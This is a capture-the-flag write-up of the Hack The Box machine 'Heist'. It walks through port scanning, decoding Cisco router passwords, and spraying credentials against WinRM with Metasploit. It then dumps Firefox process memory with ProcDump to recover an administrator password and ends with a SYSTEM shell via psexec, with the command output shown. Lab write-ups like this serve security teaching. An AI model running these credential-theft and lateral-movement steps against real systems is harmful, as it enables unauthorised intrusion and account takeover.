HTB - Heist

Heist

Getting Root:

1. We gather a few creds from a cisco router configuration after login in as guest to the application on port 80

2. Enumerated the box using enum4linux, smbmap and smbclient and was able to get two additional users

3. The box has port 5985 opened so decided to test all users and passwords to see if any of the combination was successful and was able to get a shell.

4. On the privilege escalation, I was not able to get much from Watson, Sherlock, winPEAS, PowerUp All-Checks or basic manual enumeration. However I noticed the box had Firefox listed in the process list, therefore, i decided to do a process dump using the Microsoft Sysinternals.

5. After analyzing the output file from the dump, I was able to get the password from the Administrator and login using evil-winrm.

Nmap

nmap -p- 10.10.10.149
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-09 22:24 EDT
Nmap scan report for 10.10.10.149
Host is up (0.041s latency).
Not shown: 65530 filtered ports
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
445/tcp   open  microsoft-ds
5985/tcp  open  wsman
49668/tcp open  unknown


nmap -sC -sV -p 80,135,445,5985,49668 10.10.10.149
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-09 22:27 EDT
Nmap scan report for 10.10.10.149
Host is up (0.040s latency).

PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp   open  msrpc         Microsoft Windows RPC
445/tcp   open  microsoft-ds?
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49668/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 45s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-03-10T02:28:53
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.32 seconds

Enumerating SMB

I used smbmap, smbclient, enum4linux and crackmapexec and was not able to get anything.

Enumerating http

Gobuster

http://10.10.10.149:80/attachments (Status: 301) [Size: 158]
http://10.10.10.149:80/css (Status: 301) [Size: 150]
http://10.10.10.149:80/errorpage.php (Status: 200) [Size: 1240]
http://10.10.10.149:80/images (Status: 301) [Size: 153]
http://10.10.10.149:80/Images (Status: 301) [Size: 153]
http://10.10.10.149:80/index.php (Status: 302) [Size: 0]
http://10.10.10.149:80/index.php (Status: 302) [Size: 0]
http://10.10.10.149:80/Index.php (Status: 302) [Size: 0]
http://10.10.10.149:80/issues.php (Status: 302) [Size: 16]
http://10.10.10.149:80/js (Status: 301) [Size: 149]
http://10.10.10.149:80/login.php (Status: 200) [Size: 2058]
http://10.10.10.149:80/Login.php (Status: 200) [Size: 2058]

Going to http://10.10.10.149 redirects to http://10.10.10.149/login.php. I tried admin/admin and a few other combinations but nothing worked. However there is a "Login as guest" button and I was bale to login.

There user Hazard has attached the configuration of a Cisco router.

The configuration of the Cisco router has some encrypted passwords and usernames.

Decrypting the Cisco Passwords

User: rout3r Password: $uperP@ssword

User: admin Password: Q4)sJu\Y8qz*A3?d

The enable secret: stealth1agent

Enumerating SMB Again

With the new credentials obtained I enumerated smb, using smbmap, smbclient, enum4linux and crackmapexec I was bale to get two additional usernames using enum4linux

S-1-5-21-4254423774-1266059056-3197185112-1012 SUPPORTDESK\Chase (Local User)
S-1-5-21-4254423774-1266059056-3197185112-1013 SUPPORTDESK\Jason (Local User)

Using metasploit winrm_login module to see to brute force creds. For some weird reason crackmapexec smb and winrm modules were not successful and were generating a lot of errors.

Enumerating winrm

I tried to brute force the winrm login creds with crackmapexec using its winrm module but it was failing, there I decided to sue metasploit winrm_login auxiliary module.

msf5 auxiliary(scanner/winrm/winrm_login) > run

[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\hazard:Q4)sJu\Y8qz*A3?d (Incorrect: )  
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\hazard:stealth1agent (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\hazard:$uperP@ssword (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\rout3r:Q4)sJu\Y8qz*A3?d (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\rout3r:stealth1agent (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\rout3r:$uperP@ssword (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\admin:Q4)sJu\Y8qz*A3?d (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\admin:stealth1agent (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\admin:$uperP@ssword (Incorrect: )
[+] 10.10.10.149:5985 - Login Successful: WORKSTATION\chase:Q4)sJu\Y8qz*A3?d
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\jason:Q4)sJu\Y8qz*A3?d (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\jason:stealth1agent (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\jason:$uperP@ssword (Incorrect: )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Using evil-winrm

# evil-winrm -i 10.10.10.149 -u chase -p "Q4)sJu\Y8qz*A3?d"

Privilege Escalation

Checking the Processes

We notice that Firefox is running. We could use the process dump tool from Microsoft sysinternals to create dump of the processes.

C:\Users\Chase\documents> ps

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
   1152      72   144940     183780      39.67    752   1 firefox
    407      31    17372      62200       3.64   2280   1 firefox
    343      19    10032      37420       1.03   2828   1 firefox
    390      33    52028      84108      98.34   5996   1 firefox
    358      26    16360      37764       0.63   6088   1 firefox

Using the Sysinternals Suite from Microsoft

Sysinternals Utilities - Windows Sysinternalsdocsmsft

The specific tool we are interested in is ProcDump.

ProcDump is a command-line utility whose primary purpose is monitoring an application for CPU spikes and generating crash dumps during a spike that an administrator or developer can use to determine the cause of the spike. ProcDump also includes hung window monitoring (using the same definition of a window hang that Windows and Task Manager use), unhandled exception monitoring and can generate dumps based on the values of system performance counters. It also can serve as a general process dump utility that you can embed in other scripts.

Started with the first process which is using PID 752

C:\Users\Chase\documents> .\procdump64.exe -ma 752

ProcDump v9.0 - Sysinternals process dump utility
Copyright (C) 2009-2017 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

[02:50:41] Dump 1 initiated: C:\Users\Chase\documents\firefox.exe_200310_025041.dmp  
[02:50:41] Dump 1 writing: Estimated dump file size is 484 MB.
[02:50:45] Dump 1 complete: 485 MB written in 3.6 seconds
[02:50:45] Dump count reached.

Transferred the file to my Kali box using evil-winrm

*Evil-WinRM* PS C:\Users\Chase\documents> download firefox.exe_200310_025041.dmp 

Inspecting the file after transfer

# strings firefox.exe_200310_025041.dmp | grep -i password | more
"C:\Program Files\Mozilla Firefox\firefox.exe" localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=  
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=

Got some creds from the dump: User: admin@support.htb Password: 4dD!5}x/re8]FBuZ

Using evil-winrm to test those creds with the Administrator user confirms that was the correct password.

Got a shell as SYSTEM

psexec.py Administrator:'4dD!5}x/re8]FBuZ'@10.10.10.149
Impacket v0.9.21.dev1+20200225.153700.afe746d2 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on 10.10.10.149.....
[*] Found writable share ADMIN$
[*] Uploading file xvhnmTQR.exe
[*] Opening SVCManager on 10.10.10.149.....
[*] Creating service lCrZ on 10.10.10.149.....
[*] Starting service lCrZ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.437]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>